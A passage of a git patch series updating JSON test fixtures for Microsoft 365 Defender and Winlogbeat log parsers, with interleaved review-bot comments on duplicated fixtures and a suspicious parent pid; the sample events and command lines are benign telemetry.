+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
index f2ac938fb..122a2bc61 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json
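Review bot: This hunk and the identical ones in test_email_url_info.json, test_identity_directory.json, test_identity_info.json, test_identity_logon.json, test_identity_query.json and test_local_ip.json all carry the same `NtAllocateVirtualMemoryApiCall` device event with the software_reporter_tool command line, so none of these files exercises the table its name announces (EmailEvents, EmailUrlInfo, the Identity* tables, the local-IP case). The `InitiatingProcess*` → `process` regrouping is therefore asserted seven times for one event shape and not once for an email or identity record, where the presence of process fields at all is the thing worth checking. Replacing the duplicated payload with a sample of the advertised table, or collapsing the seven copies into one fixture, would make the suite say something about those tables.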
+++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json 
@@ -3,7 +3,7 @@
 "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}"
 },
 "expected": {
- "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}",
+ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}",
 "event": {
 "action": "Moved to quarantine",
 "category": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
index 031a0b50a..57b4e7abc 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
index 7d110bb54..e45140956 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
index 0a0174b85..f1753e2d7 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
index de75ec66d..0948ffe48 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
@@ -3,7 +3,7 @@
 "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}"
 },
 "expected": {
- "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}",
+ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}",
 "event": {
 "category": [
 "iam"
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
index 6077ecfdc..3e55ad2b0 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
index f33a1eb87..55684497d 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
index 3cedbfdb3..5a6e54961 100644
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json
+++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
index 3a5d48cd4..9304ca1cb 100644
--- a/Microsoft/microsoft-365-defender/tests/test_process_error.json
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -22,10 +22,14 @@
 "@timestamp": "2024-09-24T14:18:11.864114Z",
 "action": {
 "properties": {
- "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
- "InitiatingProcessFileSize": 11864,
- "InitiatingProcessLogonId": "0",
- "LogonId": "0"
+ "LogonId": "0",
+ "process": {
+ "parent": {
+ "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+ "FileSize": 11864,
+ "LogonId": "0"
+ }
+ }
 },
 "type": "ProcessCreated"
 },
@@ -55,30 +59,36 @@
 "-F",
 "smtpd_tls_protocols\\commandtest"
 ],
- "code_signature": {
- "status": "Unknown",
- "subject_name": "Unknown"
- },
 "command_line": "grep -F smtpd_tls_protocols\\commandtest",
- "executable": "/usr/test/platform-python3.6",
- "hash": {
- "md5": "eeeee2999444ddaaaaa08598b06eafe7",
- "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
- "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
- },
- "name": "platform-python3.6",
+ "name": "grep",
 "parent": {
+ "args": [
+ "--register",
+ "/usr/lib/python3.6/run.py"
+ ],
+ "code_signature": {
+ "status": "Unknown",
+ "subject_name": "Unknown"
+ },
+ "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+ "executable": "/usr/test/platform-python3.6",
+ "hash": {
+ "md5": "eeeee2999444ddaaaaa08598b06eafe7",
+ "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
+ "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
+ },
 "name": "platform-python3.6",
- "pid": 408229,
- "start": "2024-09-24T14:17:34.790000Z"
+ "pid": 408996,
+ "start": "2024-09-24T14:18:11.850000Z",
+ "user": {
+ "domain": "testdomain",
+ "name": "testaccount"
+ },
+ "working_directory": "/usr/test"
 },
 "pid": 408996,
 "start": "2024-09-24T14:18:11.864114Z",
- "user": {
- "domain": "testdomain",
- "name": "testaccount"
- },
- "working_directory": "/usr/test"
+ "working_directory": "/usr/bin"
 },
 "related": {
 "hash": [
From 943de11e6ab15711fa104a51ee2e5a41b90a3ab5 Mon Sep 17 00:00:00 2001
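Review bot: The rewritten expectation gives `process.parent.pid` the value 408996, the same pid as the child (`"pid": 408996` a few lines below), where the previous expectation had 408229 for the parent; the two `start` values differ (`14:18:11.850000Z` against `14:18:11.864114Z`), so the parent now appears to be built from the `InitiatingProcess*` fields, which the DeviceProcessEvents hunk earlier in this patch also shows (its parent pid 10868 equals the `InitiatingProcessId` in that input). The input message of test_process_error.json is not in this hunk, so I cannot tell whether it genuinely has `ProcessId` equal to `InitiatingProcessId`; if it does, this fixture cannot distinguish the intended mapping from one that copies the child's pid into the parent, and the sample should use distinct ids for the two. The `related.hash` array that follows is outside the hunk, so whether it still lists the parent's hashes after the child lost its `hash` block cannot be checked here.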
From: LenaigKaliou Date: Thu, 14 Nov 2024 11:41:51 +0100 Subject: [PATCH 15/84] Enhancement/Winlogbeat: Addition of new events --- .../winlogbeat/tests/security_event_4624.json | 145 +++++++++++++ .../winlogbeat/tests/security_event_4625.json | 193 ++++++++++++++++++ .../winlogbeat/tests/security_event_4634.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4662.json | 105 ++++++++++ .../winlogbeat/tests/security_event_4672.json | 82 ++++++++ .../winlogbeat/tests/security_event_4689.json | 88 ++++++++ .../winlogbeat/tests/security_event_4720.json | 127 ++++++++++++ .../winlogbeat/tests/security_event_4722.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4723.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4725.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4726.json | 84 ++++++++ .../winlogbeat/tests/security_event_4768.json | 102 +++++++++ .../winlogbeat/tests/security_event_4769.json | 101 +++++++++ .../winlogbeat/tests/security_event_4798.json | 114 +++++++++++ .../winlogbeat/tests/security_event_5140.json | 5 - .../winlogbeat/tests/security_event_5145.json | 7 - 16 files changed, 1587 insertions(+), 12 deletions(-) create mode 100644 Beats/winlogbeat/tests/security_event_4624.json create mode 100644 Beats/winlogbeat/tests/security_event_4625.json create mode 100644 Beats/winlogbeat/tests/security_event_4634.json create mode 100644 Beats/winlogbeat/tests/security_event_4662.json create mode 100644 Beats/winlogbeat/tests/security_event_4672.json create mode 100644 Beats/winlogbeat/tests/security_event_4689.json create mode 100644 Beats/winlogbeat/tests/security_event_4720.json create mode 100644 Beats/winlogbeat/tests/security_event_4722.json create mode 100644 Beats/winlogbeat/tests/security_event_4723.json create mode 100644 Beats/winlogbeat/tests/security_event_4725.json create mode 100644 Beats/winlogbeat/tests/security_event_4726.json create mode 100644 Beats/winlogbeat/tests/security_event_4768.json create mode 100644 
Beats/winlogbeat/tests/security_event_4769.json create mode 100644 Beats/winlogbeat/tests/security_event_4798.json diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..9e8cdfb26 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json 
@@ -0,0 +1,145 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
